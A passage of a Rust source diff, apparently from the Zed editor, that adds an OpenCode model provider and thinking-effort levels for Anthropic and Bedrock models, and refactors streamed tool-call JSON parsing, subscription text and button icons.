+ if !entry.manifest.language_model_providers.is_empty() {
+ new_ids.insert(extension_id.clone());
+ }
}
+ registry.update(cx, |registry, cx| {
+ registry.sync_installed_llm_extensions(new_ids, cx);
+ });
}
- registry.update(cx, |registry, cx| {
- registry.sync_installed_llm_extensions(new_ids, cx);
- });
+ _ => {}
}
- _ => {}
}
})
.detach();
@@ -100,7 +107,11 @@ pub fn init(user_store: Entity<UserStore>, client: Arc<Client>, cx: &mut App) {
cx,
);
});
+ let registry = registry.downgrade();
cx.observe_global::<SettingsStore>(move |cx| {
+ let Some(registry) = registry.upgrade() else {
+ return;
+ };
let openai_compatible_providers_new = AllLanguageModelSettings::get_global(cx)
.openai_compatible
.keys()
@@ -220,5 +231,9 @@ fn register_language_model_providers(
Arc::new(XAiLanguageModelProvider::new(client.http_client(), cx)),
cx,
);
+ registry.register_provider(
+ Arc::new(OpenCodeLanguageModelProvider::new(client.http_client(), cx)),
+ cx,
+ );
registry.register_provider(Arc::new(CopilotChatLanguageModelProvider::new(cx)), cx);
}
@@ -10,6 +10,7 @@ pub mod ollama;
pub mod open_ai;
pub mod open_ai_compatible;
pub mod open_router;
+pub mod opencode;
mod util;
pub mod vercel;
pub mod vercel_ai_gateway;
@@ -24,7 +24,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
pub use settings::AnthropicAvailableModel as AvailableModel;
@@ -140,13 +140,10 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider {
}
fn recommended_models(&self, _cx: &App) -> Vec<Arc<dyn LanguageModel>> {
- [
- anthropic::Model::ClaudeSonnet4_6,
- anthropic::Model::ClaudeSonnet4_6Thinking,
- ]
- .into_iter()
- .map(|model| self.create_language_model(model))
- .collect()
+ [anthropic::Model::ClaudeSonnet4_6]
+ .into_iter()
+ .map(|model| self.create_language_model(model))
+ .collect()
}
fn provided_models(&self, cx: &App) -> Vec<Arc<dyn LanguageModel>> {
@@ -178,7 +175,12 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider {
max_output_tokens: model.max_output_tokens,
default_temperature: model.default_temperature,
extra_beta_headers: model.extra_beta_headers.clone(),
- mode: model.mode.unwrap_or_default().into(),
+ mode: match model.mode.unwrap_or_default() {
+ settings::ModelMode::Default => AnthropicModelMode::Default,
+ settings::ModelMode::Thinking { budget_tokens } => {
+ AnthropicModelMode::Thinking { budget_tokens }
+ }
+ },
},
);
}
@@ -356,10 +358,14 @@ pub fn into_anthropic_count_tokens_request(
} else {
Some(anthropic::StringOrContents::String(system_message))
},
- thinking: if request.thinking_allowed
- && let AnthropicModelMode::Thinking { budget_tokens } = mode
- {
- Some(anthropic::Thinking::Enabled { budget_tokens })
+ thinking: if request.thinking_allowed {
+ match mode {
+ AnthropicModelMode::Thinking { budget_tokens } => {
+ Some(anthropic::Thinking::Enabled { budget_tokens })
+ }
+ AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive),
+ AnthropicModelMode::Default => None,
+ }
} else {
None
},
@@ -517,7 +523,36 @@ impl LanguageModel for AnthropicModel {
}
fn supports_thinking(&self) -> bool {
- matches!(self.model.mode(), AnthropicModelMode::Thinking { .. })
+ self.model.supports_thinking()
+ }
+
+ fn supported_effort_levels(&self) -> Vec<language_model::LanguageModelEffortLevel> {
+ if self.model.supports_adaptive_thinking() {
+ vec![
+ language_model::LanguageModelEffortLevel {
+ name: "Low".into(),
+ value: "low".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Medium".into(),
+ value: "medium".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "High".into(),
+ value: "high".into(),
+ is_default: true,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Max".into(),
+ value: "max".into(),
+ is_default: false,
+ },
+ ]
+ } else {
+ Vec::new()
+ }
}
fn telemetry_id(&self) -> String {
@@ -700,10 +735,14 @@ pub fn into_anthropic(
} else {
Some(anthropic::StringOrContents::String(system_message))
},
- thinking: if request.thinking_allowed
- && let AnthropicModelMode::Thinking { budget_tokens } = mode
- {
- Some(anthropic::Thinking::Enabled { budget_tokens })
+ thinking: if request.thinking_allowed {
+ match mode {
+ AnthropicModelMode::Thinking { budget_tokens } => {
+ Some(anthropic::Thinking::Enabled { budget_tokens })
+ }
+ AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive),
+ AnthropicModelMode::Default => None,
+ }
} else {
None
},
@@ -723,7 +762,24 @@ pub fn into_anthropic(
LanguageModelToolChoice::None => anthropic::ToolChoice::None,
}),
metadata: None,
- output_config: None,
+ output_config: if request.thinking_allowed
+ && matches!(mode, AnthropicModelMode::AdaptiveThinking)
+ {
+ request.thinking_effort.as_deref().and_then(|effort| {
+ let effort = match effort {
+ "low" => Some(anthropic::Effort::Low),
+ "medium" => Some(anthropic::Effort::Medium),
+ "high" => Some(anthropic::Effort::High),
+ "max" => Some(anthropic::Effort::Max),
+ _ => None,
+ };
+ effort.map(|effort| anthropic::OutputConfig {
+ effort: Some(effort),
+ })
+ })
+ } else {
+ None
+ },
stop_sequences: Vec::new(),
speed: request.speed.map(From::from),
temperature: request.temperature.or(Some(default_temperature)),
@@ -817,9 +873,9 @@ impl AnthropicEventMapper {
// valid JSON that serde can accept, e.g. by closing
// unclosed delimiters. This way, we can update the
// UI with whatever has been streamed back so far.
- if let Ok(input) = serde_json::Value::from_str(
- &partial_json_fixer::fix_json(&tool_use.input_json),
- ) {
+ if let Ok(input) =
+ serde_json::Value::from_str(&fix_streamed_json(&tool_use.input_json))
+ {
return vec![Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
id: tool_use.id.clone().into(),
@@ -48,7 +48,7 @@ use ui_input::InputField;
use util::ResultExt;
use crate::AllLanguageModelSettings;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
actions!(bedrock, [Tab, TabPrev]);
@@ -642,10 +642,36 @@ impl LanguageModel for BedrockModel {
}
fn supports_thinking(&self) -> bool {
- matches!(
- self.model.mode(),
- BedrockModelMode::Thinking { .. } | BedrockModelMode::AdaptiveThinking { .. }
- )
+ self.model.supports_thinking()
+ }
+
+ fn supported_effort_levels(&self) -> Vec<language_model::LanguageModelEffortLevel> {
+ if self.model.supports_adaptive_thinking() {
+ vec![
+ language_model::LanguageModelEffortLevel {
+ name: "Low".into(),
+ value: "low".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Medium".into(),
+ value: "medium".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "High".into(),
+ value: "high".into(),
+ is_default: true,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Max".into(),
+ value: "max".into(),
+ is_default: false,
+ },
+ ]
+ } else {
+ Vec::new()
+ }
}
fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool {
@@ -718,7 +744,7 @@ impl LanguageModel for BedrockModel {
model_id,
self.model.default_temperature(),
self.model.max_output_tokens(),
- self.model.mode(),
+ self.model.thinking_mode(),
self.model.supports_caching(),
self.model.supports_tool_use(),
use_extended_context,
@@ -811,7 +837,7 @@ pub fn into_bedrock(
model: String,
default_temperature: f32,
max_output_tokens: u64,
- mode: BedrockModelMode,
+ thinking_mode: BedrockModelMode,
supports_caching: bool,
supports_tool_use: bool,
allow_extended_context: bool,
@@ -1085,11 +1111,24 @@ pub fn into_bedrock(
system: Some(system_message),
tools: tool_config,
thinking: if request.thinking_allowed {
- match mode {
+ match thinking_mode {
BedrockModelMode::Thinking { budget_tokens } => {
Some(bedrock::Thinking::Enabled { budget_tokens })
}
- BedrockModelMode::AdaptiveThinking { effort } => {
+ BedrockModelMode::AdaptiveThinking {
+ effort: default_effort,
+ } => {
+ let effort = request
+ .thinking_effort
+ .as_deref()
+ .and_then(|e| match e {
+ "low" => Some(bedrock::BedrockAdaptiveThinkingEffort::Low),
+ "medium" => Some(bedrock::BedrockAdaptiveThinkingEffort::Medium),
+ "high" => Some(bedrock::BedrockAdaptiveThinkingEffort::High),
+ "max" => Some(bedrock::BedrockAdaptiveThinkingEffort::Max),
+ _ => None,
+ })
+ .unwrap_or(default_effort);
Some(bedrock::Thinking::Adaptive { effort })
}
BedrockModelMode::Default => None,
@@ -1205,7 +1244,7 @@ pub fn map_to_language_model_completion_events(
{
tool_use.input_json.push_str(tool_output.input());
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&tool_use.input_json),
+ &fix_streamed_json(&tool_use.input_json),
) {
Some(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -1574,7 +1613,8 @@ impl Render for ConfigurationView {
}
v_flex()
- .size_full()
+ .min_w_0()
+ .w_full()
.track_focus(&self.focus_handle)
.on_action(cx.listener(Self::on_tab))
.on_action(cx.listener(Self::on_tab_prev))
@@ -1,7 +1,6 @@
use ai_onboarding::YoungAccountBanner;
use anthropic::AnthropicModelMode;
use anyhow::{Context as _, Result, anyhow};
-use chrono::{DateTime, Utc};
use client::{Client, UserStore, zed_urls};
use cloud_api_types::{OrganizationId, Plan};
use cloud_llm_client::{
@@ -109,9 +108,10 @@ impl State {
cx: &mut Context<Self>,
) -> Self {
let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx);
+ let llm_api_token = LlmApiToken::global(cx);
Self {
client: client.clone(),
- llm_api_token: LlmApiToken::default(),
+ llm_api_token,
user_store: user_store.clone(),
status,
models: Vec::new(),
@@ -156,11 +156,8 @@ impl State {
.user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone());
+ .map(|organization| organization.id.clone());
cx.spawn(async move |this, cx| {
- llm_api_token
- .refresh(&client, organization_id.clone())
- .await?;
let response =
Self::fetch_models(client, llm_api_token, organization_id).await?;
this.update(cx, |this, cx| {
@@ -634,7 +631,7 @@ impl LanguageModel for CloudLanguageModel {
fn supports_split_token_display(&self) -> bool {
use cloud_llm_client::LanguageModelProvider::*;
- matches!(self.model.provider, OpenAi)
+ matches!(self.model.provider, OpenAi | XAi)
}
fn telemetry_id(&self) -> String {
@@ -644,11 +641,11 @@ impl LanguageModel for CloudLanguageModel {
fn tool_input_format(&self) -> LanguageModelToolSchemaFormat {
match self.model.provider {
cloud_llm_client::LanguageModelProvider::Anthropic
- | cloud_llm_client::LanguageModelProvider::OpenAi
- | cloud_llm_client::LanguageModelProvider::XAi => {
+ | cloud_llm_client::LanguageModelProvider::OpenAi => {
LanguageModelToolSchemaFormat::JsonSchema
}
- cloud_llm_client::LanguageModelProvider::Google => {
+ cloud_llm_client::LanguageModelProvider::Google
+ | cloud_llm_client::LanguageModelProvider::XAi => {
LanguageModelToolSchemaFormat::JsonSchemaSubset
}
}
@@ -707,7 +704,7 @@ impl LanguageModel for CloudLanguageModel {
.user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone());
+ .map(|organization| organization.id.clone());
let model_id = self.model.id.to_string();
let generate_content_request =
into_google(request, model_id.clone(), GoogleModelMode::Default);
@@ -779,7 +776,7 @@ impl LanguageModel for CloudLanguageModel {
user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone())
+ .map(|organization| organization.id.clone())
});
let thinking_allowed = request.thinking_allowed;
let enable_thinking = thinking_allowed && self.model.supports_thinking;
@@ -1093,7 +1090,6 @@ fn response_lines<T: DeserializeOwned>(
struct ZedAiConfiguration {
is_connected: bool,
plan: Option<Plan>,
- subscription_period: Option<(DateTime<Utc>, DateTime<Utc>)>,
eligible_for_trial: bool,
account_too_young: bool,
sign_in_callback: Arc<dyn Fn(&mut Window, &mut App) + Send + Sync>,
@@ -1101,33 +1097,37 @@ struct ZedAiConfiguration {
impl RenderOnce for ZedAiConfiguration {
fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
- let is_pro = self.plan.is_some_and(|plan| plan == Plan::ZedPro);
- let subscription_text = match (self.plan, self.subscription_period) {
- (Some(Plan::ZedPro), Some(_)) => {
- "You have access to Zed's hosted models through your Pro subscription."
- }
- (Some(Plan::ZedProTrial), Some(_)) => {
- "You have access to Zed's hosted models through your Pro trial."
- }
- (Some(Plan::ZedFree), Some(_)) => {
- if self.eligible_for_trial {
- "Subscribe for access to Zed's hosted models. Start with a 14 day free trial."
- } else {
- "Subscribe for access to Zed's hosted models."
- }
- }
- _ => {
+ let (subscription_text, has_paid_plan) = match self.plan {
+ Some(Plan::ZedPro) => (
+ "You have access to Zed's hosted models through your Pro subscription.",
+ true,
+ ),
+ Some(Plan::ZedProTrial) => (
+ "You have access to Zed's hosted models through your Pro trial.",
+ false,
+ ),
+ Some(Plan::ZedStudent) => (
+ "You have access to Zed's hosted models through your Student subscription.",
+ true,
+ ),
+ Some(Plan::ZedBusiness) => (
+ "You have access to Zed's hosted models through your Organization.",
+ true,
+ ),
+ Some(Plan::ZedFree) | None => (
if self.eligible_for_trial {
"Subscribe for access to Zed's hosted models. Start with a 14 day free trial."
} else {
"Subscribe for access to Zed's hosted models."
- }
- }
+ },
+ false,
+ ),
};
- let manage_subscription_buttons = if is_pro {
+ let manage_subscription_buttons = if has_paid_plan {
Button::new("manage_settings", "Manage Subscription")
.full_width()
+ .label_size(LabelSize::Small)
.style(ButtonStyle::Tinted(TintColor::Accent))
.on_click(|_, _, cx| cx.open_url(&zed_urls::account_url(cx)))
.into_any_element()
@@ -1151,10 +1151,7 @@ impl RenderOnce for ZedAiConfiguration {
.child(Label::new("Sign in to have access to Zed's complete agentic experience with hosted models."))
.child(
Button::new("sign_in", "Sign In to use Zed AI")
- .icon_color(Color::Muted)
- .icon(IconName::Github)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Github).size(IconSize::Small).color(Color::Muted))
.full_width()
.on_click({
let callback = self.sign_in_callback.clone();
@@ -1211,7 +1208,6 @@ impl Render for ConfigurationView {
ZedAiConfiguration {
is_connected: !state.is_signed_out(cx),
plan: user_store.plan(),
- subscription_period: user_store.subscription_period(),
eligible_for_trial: user_store.trial_started_at().is_none(),
account_too_young: user_store.account_too_young(),
sign_in_callback: self.sign_in_callback.clone(),
@@ -1242,9 +1238,6 @@ impl Component for ZedAiConfiguration {
ZedAiConfiguration {
is_connected,
plan,
- subscription_period: plan
- .is_some()
- .then(|| (Utc::now(), Utc::now() + chrono::Duration::days(7))),
eligible_for_trial,
account_too_young,
sign_in_callback: Arc::new(|_, _| {}),
@@ -33,7 +33,7 @@ use ui::prelude::*;
use util::debug_panic;
use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic};
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("copilot_chat");
const PROVIDER_NAME: LanguageModelProviderName =
@@ -579,7 +579,7 @@ pub fn map_to_language_model_completion_events(
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -1111,38 +1111,26 @@ fn into_copilot_responses(
Role::User => {
for content in &message.content {
if let MessageContent::ToolResult(tool_result) = content {
- let output = if let Some(out) = &tool_result.output {
- match out {
- serde_json::Value::String(s) => {
- responses::ResponseFunctionOutput::Text(s.clone())
- }
- serde_json::Value::Null => {
- responses::ResponseFunctionOutput::Text(String::new())
- }
- other => responses::ResponseFunctionOutput::Text(other.to_string()),
+ let output = match &tool_result.content {
+ LanguageModelToolResultContent::Text(text) => {
+ responses::ResponseFunctionOutput::Text(text.to_string())
}
- } else {
- match &tool_result.content {
- LanguageModelToolResultContent::Text(text) => {
- responses::ResponseFunctionOutput::Text(text.to_string())
- }
- LanguageModelToolResultContent::Image(image) => {
- if model.supports_vision() {
- responses::ResponseFunctionOutput::Content(vec![
- responses::ResponseInputContent::InputImage {
- image_url: Some(image.to_base64_url()),
- detail: Default::default(),
- },
- ])
- } else {
- debug_panic!(
- "This should be caught at {} level",
- tool_result.tool_name
- );
- responses::ResponseFunctionOutput::Text(
+ LanguageModelToolResultContent::Image(image) => {
+ if model.supports_vision() {
+ responses::ResponseFunctionOutput::Content(vec![
+ responses::ResponseInputContent::InputImage {
+ image_url: Some(image.to_base64_url()),
+ detail: Default::default(),
+ },
+ ])
+ } else {
+ debug_panic!(
+ "This should be caught at {} level",
+ tool_result.tool_name
+ );
+ responses::ResponseFunctionOutput::Text(
"[Tool responded with an image, but this model does not support vision]".into(),
)
- }
}
}
};
@@ -22,7 +22,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("deepseek");
const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("DeepSeek");
@@ -331,15 +331,25 @@ pub fn into_deepseek(
for message in request.messages {
for content in message.content {
match content {
- MessageContent::Text(text) => messages.push(match message.role {
- Role::User => deepseek::RequestMessage::User { content: text },
- Role::Assistant => deepseek::RequestMessage::Assistant {
- content: Some(text),
- tool_calls: Vec::new(),
- reasoning_content: current_reasoning.take(),
- },
- Role::System => deepseek::RequestMessage::System { content: text },
- }),
+ MessageContent::Text(text) => {
+ let should_add = if message.role == Role::User {
+ !text.trim().is_empty()
+ } else {
+ !text.is_empty()
+ };
+
+ if should_add {
+ messages.push(match message.role {
+ Role::User => deepseek::RequestMessage::User { content: text },
+ Role::Assistant => deepseek::RequestMessage::Assistant {
+ content: Some(text),
+ tool_calls: Vec::new(),
+ reasoning_content: current_reasoning.take(),
+ },
+ Role::System => deepseek::RequestMessage::System { content: text },
+ });
+ }
+ }
MessageContent::Thinking { text, .. } => {
// Accumulate reasoning content for next assistant message
current_reasoning.get_or_insert_default().push_str(&text);
@@ -445,7 +455,9 @@ impl DeepSeekEventMapper {
};
let mut events = Vec::new();
- if let Some(content) = choice.delta.content.clone() {
+ if let Some(content) = choice.delta.content.clone()
+ && !content.is_empty()
+ {
events.push(Ok(LanguageModelCompletionEvent::Text(content)));
}
@@ -476,7 +488,7 @@ impl DeepSeekEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -820,9 +820,7 @@ impl ConfigurationView {
.child(
Button::new("reset-api-url", "Reset API URL")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.on_click(
cx.listener(|this, _, _window, cx| this.reset_api_url(_window, cx)),
@@ -918,9 +916,11 @@ impl Render for ConfigurationView {
this.child(
Button::new("lmstudio-site", "LM Studio")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url(LMSTUDIO_SITE)
})
@@ -933,9 +933,11 @@ impl Render for ConfigurationView {
"Download LM Studio",
)
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url(LMSTUDIO_DOWNLOAD_URL)
})
@@ -946,9 +948,11 @@ impl Render for ConfigurationView {
.child(
Button::new("view-models", "Model Catalog")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url(LMSTUDIO_CATALOG_URL)
}),
@@ -981,9 +985,9 @@ impl Render for ConfigurationView {
} else {
this.child(
Button::new("retry_lmstudio_models", "Connect")
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon(IconName::PlayFilled)
+ .start_icon(
+ Icon::new(IconName::PlayFilled).size(IconSize::XSmall),
+ )
.on_click(cx.listener(move |this, _, _window, cx| {
this.retry_connection(_window, cx)
})),
@@ -22,7 +22,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("mistral");
const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("Mistral");
@@ -647,7 +647,7 @@ impl MistralEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -400,7 +400,14 @@ impl OllamaLanguageModel {
stream: true,
options: Some(ChatOptions {
num_ctx: Some(self.model.max_tokens),
- stop: Some(request.stop),
+ // Only send stop tokens if explicitly provided. When empty/None,
+ // Ollama will use the model's default stop tokens from its Modelfile.
+ // Sending an empty array would override and disable the defaults.
+ stop: if request.stop.is_empty() {
+ None
+ } else {
+ Some(request.stop)
+ },
temperature: request.temperature.or(Some(1.0)),
..Default::default()
}),
@@ -858,9 +865,7 @@ impl ConfigurationView {
.child(
Button::new("reset-context-window", "Reset")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.on_click(
cx.listener(|this, _, window, cx| {
@@ -905,9 +910,7 @@ impl ConfigurationView {
.child(
Button::new("reset-api-url", "Reset API URL")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.on_click(
cx.listener(|this, _, window, cx| this.reset_api_url(window, cx)),
@@ -949,9 +952,11 @@ impl Render for ConfigurationView {
this.child(
Button::new("ollama-site", "Ollama")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| cx.open_url(OLLAMA_SITE))
.into_any_element(),
)
@@ -959,9 +964,11 @@ impl Render for ConfigurationView {
this.child(
Button::new("download_ollama_button", "Download Ollama")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
cx.open_url(OLLAMA_DOWNLOAD_URL)
})
@@ -972,9 +979,11 @@ impl Render for ConfigurationView {
.child(
Button::new("view-models", "View All Models")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| cx.open_url(OLLAMA_LIBRARY_URL)),
),
)
@@ -1005,9 +1014,9 @@ impl Render for ConfigurationView {
} else {
this.child(
Button::new("retry_ollama_models", "Connect")
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon(IconName::PlayOutlined)
+ .start_icon(
+ Icon::new(IconName::PlayOutlined).size(IconSize::XSmall),
+ )
.on_click(cx.listener(move |this, _, window, cx| {
this.retry_connection(window, cx)
})),
@@ -9,14 +9,13 @@ use language_model::{
LanguageModelCompletionEvent, LanguageModelId, LanguageModelImage, LanguageModelName,
LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName,
LanguageModelProviderState, LanguageModelRequest, LanguageModelRequestMessage,
- LanguageModelToolChoice, LanguageModelToolResult, LanguageModelToolResultContent,
- LanguageModelToolUse, LanguageModelToolUseId, MessageContent, RateLimiter, Role, StopReason,
- TokenUsage, env_var,
+ LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolUse,
+ LanguageModelToolUseId, MessageContent, RateLimiter, Role, StopReason, TokenUsage, env_var,
};
use menu;
use open_ai::responses::{
- ResponseFunctionCallItem, ResponseFunctionCallOutputItem, ResponseInputContent,
- ResponseInputItem, ResponseMessageItem,
+ ResponseFunctionCallItem, ResponseFunctionCallOutputContent, ResponseFunctionCallOutputItem,
+ ResponseInputContent, ResponseInputItem, ResponseMessageItem,
};
use open_ai::{
ImageUrl, Model, OPEN_AI_API_URL, ReasoningEffort, ResponseStreamEvent,
@@ -34,7 +33,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = language_model::OPEN_AI_PROVIDER_ID;
const PROVIDER_NAME: LanguageModelProviderName = language_model::OPEN_AI_PROVIDER_NAME;
@@ -506,12 +505,16 @@ pub fn into_open_ai(
model: model_id.into(),
messages,
stream,
+ stream_options: if stream {
+ Some(open_ai::StreamOptions::default())
+ } else {
+ None
+ },
stop: request.stop,
temperature: request.temperature.or(Some(1.0)),
max_completion_tokens: max_output_tokens,
parallel_tool_calls: if supports_parallel_tool_calls && !request.tools.is_empty() {
- // Disable parallel tool calls, as the Agent currently expects a maximum of one per turn.
- Some(false)
+ Some(supports_parallel_tool_calls)
} else {
None
},
@@ -642,7 +645,18 @@ fn append_message_to_response_items(
input_items.push(ResponseInputItem::FunctionCallOutput(
ResponseFunctionCallOutputItem {
call_id: tool_result.tool_use_id.to_string(),
- output: tool_result_output(&tool_result),
+ output: match tool_result.content {
+ LanguageModelToolResultContent::Text(text) => {
+ ResponseFunctionCallOutputContent::Text(text.to_string())
+ }
+ LanguageModelToolResultContent::Image(image) => {
+ ResponseFunctionCallOutputContent::List(vec![
+ ResponseInputContent::Image {
+ image_url: image.to_base64_url(),
+ },
+ ])
+ }
+ },
},
));
}
@@ -710,21 +724,6 @@ fn flush_response_parts(
parts.clear();
}
-fn tool_result_output(result: &LanguageModelToolResult) -> String {
- if let Some(output) = &result.output {
- match output {
- serde_json::Value::String(text) => text.clone(),
- serde_json::Value::Null => String::new(),
- _ => output.to_string(),
- }
- } else {
- match &result.content {
- LanguageModelToolResultContent::Text(text) => text.to_string(),
- LanguageModelToolResultContent::Image(image) => image.to_base64_url(),
- }
- }
-}
-
fn add_message_content_part(
new_part: open_ai::MessagePart,
role: Role,
@@ -836,7 +835,7 @@ impl OpenAiEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -991,7 +990,7 @@ impl OpenAiResponseEventMapper {
if let Some(entry) = self.function_calls_by_item.get_mut(&item_id) {
entry.arguments.push_str(&delta);
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
return vec![Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -1415,9 +1414,11 @@ impl Render for ConfigurationView {
)
.child(
Button::new("docs", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url("https://zed.dev/docs/ai/llm-providers#openai-api-compatible")
}),
@@ -1439,7 +1440,9 @@ impl Render for ConfigurationView {
mod tests {
use futures::{StreamExt, executor::block_on};
use gpui::TestAppContext;
- use language_model::{LanguageModelRequestMessage, LanguageModelRequestTool};
+ use language_model::{
+ LanguageModelRequestMessage, LanguageModelRequestTool, LanguageModelToolResult,
+ };
use open_ai::responses::{
ReasoningSummaryPart, ResponseFunctionToolCall, ResponseOutputItem, ResponseOutputMessage,
ResponseReasoningItem, ResponseStatusDetails, ResponseSummary, ResponseUsage,
@@ -1685,7 +1688,7 @@ mod tests {
{
"type": "function_call_output",
"call_id": "call-42",
- "output": "{\"forecast\":\"Sunny\"}"
+ "output": "Sunny"
}
],
"stream": true,
@@ -545,9 +545,7 @@ impl Render for ConfigurationView {
.child(
Button::new("reset-api-key", "Reset API Key")
